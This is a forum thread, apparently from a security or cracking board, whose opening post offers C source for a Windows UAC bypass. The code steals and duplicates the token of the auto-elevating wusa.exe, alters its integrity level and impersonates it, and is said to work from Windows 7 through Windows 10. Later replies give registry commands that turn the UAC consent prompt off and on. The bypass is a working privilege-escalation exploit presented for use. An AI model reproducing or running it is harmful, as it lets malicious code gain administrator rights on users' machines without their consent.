Uac bypass implementation

[0xall0c]

This is an implementation of uac bypass method (Author: CIA & James Forshaw).
Works from windows 7 to latest windows 10 fall creators update.

Code:

int StepOverUAC()
{
	SECURITY_ATTRIBUTES sa;
	sa.nLength = sizeof(SECURITY_ATTRIBUTES);
	sa.bInheritHandle = TRUE;
	sa.lpSecurityDescriptor = NULL;

	if (!CreatePipe(&inRead, &inWrite, &sa, 0))
		return 0;
	if (!CreatePipe(&outRead, &outWrite, &sa, 0))
		return 0;
	NtSetInformationToken nt = (NtSetInformationToken)GetProcAddress(LoadLibraryA("ntdll.dll"), "NtSetInformationToken");
	RtlLengthSid rts = (RtlLengthSid)GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlLengthSid");
	NtFilterToken filter = (NtFilterToken)GetProcAddress(LoadLibraryA("ntdll.dll"), "NtFilterToken");
	DWORD Error, bytesIO;
	NTSTATUS Status;
	HANDLE hProcessToken = NULL, hNewToken = NULL, hTest;
	HANDLE filterToken = NULL;
	BOOL bCond = FALSE;
	SHELLEXECUTEINFO shinfo, sh;
	SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
	TOKEN_MANDATORY_LABEL tml, *ptml;
	PSID pIntegritySid = NULL;
	STARTUPINFO si, si2;
	PROCESS_INFORMATION pi, pi2;
	WCHAR szBuffer[MAX_PATH];

	RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
	shinfo.cbSize = sizeof(shinfo);
	shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
	shinfo.lpFile = L"wusa.exe";
	shinfo.nShow = SW_HIDE;
	if (!ShellExecuteEx(&shinfo))
		return 0;
	if (!OpenProcessToken(shinfo.hProcess, MAXIMUM_ALLOWED, &hProcessToken))
		return 0;
	TerminateProcess(shinfo.hProcess, -1);
	WaitForSingleObject(shinfo.hProcess, -1);
	if (!DuplicateTokenEx(hProcessToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hNewToken))
		return 0;
	if (!AllocateAndInitializeSid(&MLAuthority, 1, SECURITY_MANDATORY_MEDIUM_RID,0, 0, 0, 0, 0, 0, 0, &pIntegritySid))
		return 0;
	tml.Label.Attributes = SE_GROUP_INTEGRITY;
	tml.Label.Sid = pIntegritySid;
	Status = nt(hNewToken, TokenIntegrityLevel, &tml, sizeof(tml));
	if (!NT_SUCCESS(Status))
		return 0;
	filter(hNewToken, 0x4, NULL, NULL, NULL, &filterToken);
	if (!ImpersonateLoggedOnUser(filterToken))
		return 0;
}

After this just use ShellExecute with "runas" verb.

[TechLord]

See this post for the latest developments in UAC Bypass updated just 3 days ago in our sister forum :

Windows 10 Redstone 1/2 UAC changes

[0xall0c]

had no info about the upcoming release, still use till can

[sendersu]

even very hot & latest w10?

[0xall0c]

there is nothing hot about it :P

[niculaita]

how to restore UAC in 1st or 2nd position with an exe or with regfile ?
sometime I telework on windows in other languages and is difficult to find UAC and restore back to normal. Thanks!

[0xall0c]

to turn off uac completely:

Code:

reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0

to back to normal

Code:

reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 5

hope this helps.

[niculaita]

in cmd
C:\Users\Nicolae>reg ADD / HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0
ERROR: Invalid key name.
Type "REG ADD /?" for usage.


maybe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /f

and
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t reg_dword /d 5 /f

what is /f for ?

[0xall0c]

/f makes sure to overwrite if the specified key value already exists, without prompting the user.